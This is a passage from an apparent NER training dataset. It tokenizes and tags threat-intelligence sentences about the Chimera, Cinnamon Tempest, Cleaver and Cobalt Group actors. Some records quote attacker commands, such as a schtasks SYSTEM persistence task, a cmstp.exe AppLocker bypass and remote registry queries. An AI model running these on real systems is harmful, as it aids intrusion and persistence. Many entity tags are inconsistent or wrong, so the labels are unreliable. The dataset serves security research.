"O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "dumped", - "password", - "hashes", - "for", - "use", - "in", - "pass", - "the", - "hash", - "authentication", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "the", - "NtdsAudit", - "utility", - "to", - "collect", - "information", - "related", - "to", - "accounts", - "and", - "passwords." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "multiple", - "password", - "spraying", - "attacks", - "against", - "victim's", - "remote", - "services", - "to", - "obtain", - "valid", - "user", - "and", - "administrator", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "PowerShell", - "scripts", - "to", - "execute", - "malicious", - "payloads", - "and", - "the", - "DSInternals", - "PowerShell", - "module", - "to", - "make", - "use", - "of", - "Active", - "Directory", - "features." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "<code>tasklist</code>", - "to", - "enumerate", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "encapsulated", - "Cobalt", - "Strike's", - "C2", - "protocol", - "in", - "DNS", - "and", - "HTTPS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "queried", - "Registry", - "keys", - "using", - "<code>reg", - "query", - "\\\\<host>\\HKU\\<SID>\\SOFTWARE\\Microsoft\\Terminal", - "Server", - "Client\\Servers</code>", - "and", - "<code>reg", - "query", - "\\\\<host>\\HKU\\<SID>\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet", - "Settings</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "staged", - "stolen", - "data", - "on", - "designated", - "servers", - "in", - "the", - "target", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "RDP", - "to", - "access", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "harvested", - "data", - "from", - "remote", - "mailboxes", - "including", - "through", - "execution", - "of", - "<code>\\\\<hostname>\\c$\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook*.ost</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "utilized", - "various", - "scans", - "and", - "queries", - "to", - "find", - "domain", - "controllers", - "and", - "remote", - "services", - "in", - "the", - "target", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "Windows", - "admin", - "shares", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "scheduled", - "tasks", - "to", - "invoke", - "Cobalt", - "Strike", - "including", - "through", - "batch", - "script", - "<code>schtasks", - "/create", - "/ru", - "\"SYSTEM\"", - "/tn", - "\"update\"", - "/tr", - "\"cmd", - "/c", - "c:\\windows\\temp\\update.bat\"", - "/sc", - "once", - "/f", - "/st</code>", - "and", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "PsExec", - "to", - "deploy", - "beacons", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "collected", - "documents", - "from", - "the", - "victim's", - "SharePoint." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "`fsutil", - "fsinfo", - "drives`,", - "`systeminfo`,", - "and", - "`vssadmin", - "list", - "shadows`", - "for", - "system", - "information", - "including", - "shadow", - "volumes", - "and", - "drive", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "ipconfig,", - "Ping,", - "and", - "<code>tracert</code>", - "to", - "enumerate", - "the", - "IP", - "address", - "and", - "network", - "environment", - "and", - "settings", - "of", - "the", - "local", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "<code>netstat", - "-ano", - "|", - "findstr", - "EST</code>", - "to", - "discover", - "network", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "the", - "<code>quser</code>", - "command", - "to", - "show", - "currently", - "logged", - "on", - "users." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "<code>net", - "start</code>", - "and", - "<code>net", - "use</code>", - "for", - "system", - "service", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "<code>time", - "/t</code>", - "and", - "<code>net", - "time", - "\\\\ip/hostname</code>", - "for", - "system", - "time", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "a", - "Windows", - "version", - "of", - "the", - "Linux", - "<code>touch</code>", - "command", - "to", - "modify", - "the", - "date", - "and", - "time", - "stamp", - "on", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "BloodHound,", - "Cobalt", - "Strike,", - "Mimikatz,", - "and", - "PsExec." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "a", - "valid", - "account", - "to", - "maintain", - "persistence", - "via", - "scheduled", - "task." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "the", - "Windows", - "Command", - "Shell", - "and", - "batch", - "scripts", - "for", - "execution", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "WMIC", - "to", - "execute", - "remote", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Chimera", - "has", - "used", - "WinRM", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "search", - "order", - "hijacking", - "to", - "launch", - "Cobalt", - "Strike", - "Beacons." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "abused", - "legitimate", - "executables", - "to", - "side-load", - "weaponized", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "weaponized", - "DLLs", - "to", - "load", - "and", - "decrypt", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "obtained", - "highly", - "privileged", - "credentials", - "such", - "as", - "domain", - "administrator", - "in", - "order", - "to", - "deploy", - "malware." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "B-OffAct" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "uploaded", - "captured", - "keystroke", - "logs", - "to", - "the", - "Alibaba", - "Cloud", - "Object", - "Storage", - "Service,", - "Aliyun", - "OSS." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "exploited", - "multiple", - "unpatched", - "vulnerabilities", - "for", - "initial", - "access", - "including", - "vulnerabilities", - "in", - "Microsoft", - "Exchange,", - "Manage", - "Engine", - "AdSelfService", - "Plus,", - "Confluence,", - "and", - "Log4j." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "maintained", - "leak", - "sites", - "for", - "exfiltrated", - "data", - "in", - "attempt", - "to", - "extort", - "victims", - "into", - "paying", - "a", - "ransom." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "Group", - "Policy", - "to", - "deploy", - "batch", - "scripts", - "for", - "ransomware", - "deployment." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "downloaded", - "files,", - "including", - "Cobalt", - "Strike,", - "to", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "PowerShell", - "to", - "communicate", - "with", - "C2,", - "download", - "files,", - "and", - "execute", - "reconnaissance", - "commands." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "the", - "Iox", - "and", - "NPS", - "proxy", - "and", - "tunneling", - "tools", - "in", - "combination", - "create", - "multiple", - "connections", - "through", - "a", - "single", - "tunnel." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "B-Tool", - "B-Tool", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "a", - "customized", - "version", - "of", - "the", - "Iox", - "port-forwarding", - "and", - "proxy", - "tool." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "a", - "customized", - "version", - "of", - "the", - "Impacket", - "wmiexec.py", - "module", - "to", - "create", - "renamed", - "output", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "SMBexec", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "deployed", - "ransomware", - "from", - "a", - "batch", - "file", - "in", - "a", - "network", - "share." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "open-source", - "tools", - "including", - "customized", - "versions", - "of", - "the", - "Iox", - "proxy", - "tool,", - "NPS", - "tunneling", - "tool,", - "Meterpreter,", - "and", - "a", - "keylogger", - "that", - "uploads", - "data", - "to", - "Alibaba", - "cloud", - "storage." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "I-Tool", - "O", - "B-Way", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "compromised", - "user", - "accounts", - "to", - "deploy", - "payloads", - "and", - "create", - "system", - "services." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "executed", - "ransomware", - "using", - "batch", - "scripts", - "deployed", - "via", - "GPO." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "used", - "Impacket", - "for", - "lateral", - "movement", - "via", - "WMI." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cinnamon", - "Tempest", - "has", - "created", - "system", - "services", - "to", - "establish", - "persistence", - "for", - "deployed", - "tooling." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cleaver", - "has", - "used", - "custom", - "tools", - "to", - "facilitate", - "ARP", - "cache", - "poisoning." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Cleaver", - "has", - "been", - "known", - "to", - "dump", - "credentials", - "using", - "Mimikatz", - "and", - "Windows", - "Credential", - "Editor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "B-SecTeam", - "B-Tool" - ] - }, - { - "tokens": [ - "Cleaver", - "has", - "created", - "customized", - "tools", - "and", - "payloads", - "for", - "functions", - "including", - "ARP", - "poisoning,", - "encryption,", - "credential", - "dumping,", - "ASP.NET", - "shells,", - "web", - "backdoors,", - "process", - "enumeration,", - "WMI", - "querying,", - "HTTP", - "and", - "SMB", - "communications,", - "network", - "interface", - "sniffing,", - "and", - "keystroke", - "logging." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "B-Features", - "B-Way", - "B-HackOrg", - "B-Way", - "B-Tool", - "B-Tool", - "B-Tool", - "I-Features", - "B-HackOrg", - "B-Way", - "B-HackOrg", - "B-Way", - "O", - "B-Tool", - "O", - "I-Features", - "I-Features", - "O", - "O", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Cleaver", - "has", - "created", - "fake", - "LinkedIn", - "profiles", - "that", - "included", - "profile", - "photos,", - "details,", - "and", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cleaver", - "has", - "obtained", - "and", - "used", - "open-source", - "tools", - "such", - "as", - "PsExec,", - "Windows", - "Credential", - "Editor,", - "and", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "the", - "Plink", - "utility", - "to", - "create", - "SSH", - "tunnels." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "bypassed", - "UAC." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "the", - "command", - "<code>cmstp.exe", - "/s", - "/ns", - "C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt</code>", - "to", - "bypass", - "AppLocker", - "and", - "launch", - "a", - "malicious", - "script." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "obfuscated", - "several", - "scriptlets", - "and", - "code", - "used", - "on", - "the", - "victim’s", - "machine,", - "including", - "through", - "use", - "of", - "XOR", - "and", - "RC4." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "compromised", - "legitimate", - "web", - "browser", - "updates", - "to", - "deliver", - "a", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "DNS", - "tunneling", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "sent", - "malicious", - "Word", - "OLE", - "compound", - "documents", - "to", - "victims." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-SamFile", - "B-Way", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "had", - "exploited", - "multiple", - "vulnerabilities", - "for", - "execution,", - "including", - "Microsoft’s", - "Equation", - "Editor", - "(CVE-2017-11882),", - "an", - "Internet", - "Explorer", - "vulnerability", - "(CVE-2018-8174),", - "CVE-2017-8570,", - "CVE-2017-0199,", - "and", - "CVE-2017-8759." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "exploits", - "to", - "increase", - "their", - "levels", - "of", - "rights", - "and", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "deleted", - "the", - "DLL", - "dropper", - "from", - "the", - "victim’s", - "machine", - "to", - "cover", - "their", - "tracks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "public", - "sites", - "such", - "as", - "github.com", - "and", - "sendspace.com", - "to", - "upload", - "files", - "and", - "then", - "download", - "them", - "to", - "victim", - "computers.", - "The", - "group's", - "JavaScript", - "backdoor", - "is", - "also", - "capable", - "of", - "downloading", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "executed", - "JavaScript", - "scriptlets", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "added", - "persistence", - "by", - "registering", - "the", - "file", - "name", - "for", - "the", - "next", - "stage", - "malware", - "under", - "<code>HKCU\\Environment\\UserInitMprLogonScript</code>." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "sent", - "emails", - "containing", - "malicious", - "attachments", - "that", - "require", - "users", - "to", - "execute", - "a", - "file", - "or", - "macro", - "to", - "infect", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "sent", - "emails", - "containing", - "malicious", - "links", - "that", - "require", - "users", - "to", - "execute", - "a", - "file", - "or", - "macro", - "to", - "infect", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "leveraged", - "an", - "open-source", - "tool", - "called", - "SoftPerfect", - "Network", - "Scanner", - "to", - "perform", - "network", - "scanning." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "<code>odbcconf</code>", - "to", - "proxy", - "the", - "execution", - "of", - "malicious", - "DLL", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "powershell.exe", - "to", - "download", - "and", - "execute", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "injected", - "code", - "into", - "trusted", - "processes." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "the", - "Plink", - "utility", - "to", - "create", - "SSH", - "tunnels." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "Registry", - "Run", - "keys", - "for", - "persistence.", - "The", - "group", - "has", - "also", - "set", - "a", - "Startup", - "path", - "to", - "launch", - "the", - "PowerShell", - "shell", - "command", - "and", - "download", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "regsvr32.exe", - "to", - "execute", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "used", - "the", - "Ammyy", - "Admin", - "tool", - "as", - "well", - "as", - "TeamViewer", - "for", - "remote", - "access,", - "including", - "to", - "preserve", - "remote", - "access", - "if", - "a", - "Cobalt", - "Strike", - "module", - "was", - "lost." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "I-OffAct", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "used", - "Remote", - "Desktop", - "Protocol", - "to", - "conduct", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "created", - "Windows", - "tasks", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "used", - "a", - "JavaScript", - "backdoor", - "that", - "is", - "capable", - "of", - "collecting", - "a", - "list", - "of", - "the", - "security", - "solutions", - "installed", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Group", - "has", - "sent", - "spearphishing", - "emails", - "with", - "various", - "attachment", - "types", - "to", - "corporate", - "and", - "personal", - "email", - "accounts", - "of", - "victim", - "organizations.", - "Attachment", - "types", - "have", - "included", - ".rtf,", - ".doc,", - ".xls,", - "archives", - "containing", - "LNK", - "files,", - "and", - "password", - "protected", - "archives", - "containing", - ".exe", - "and", - ".scr", - "executables." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - 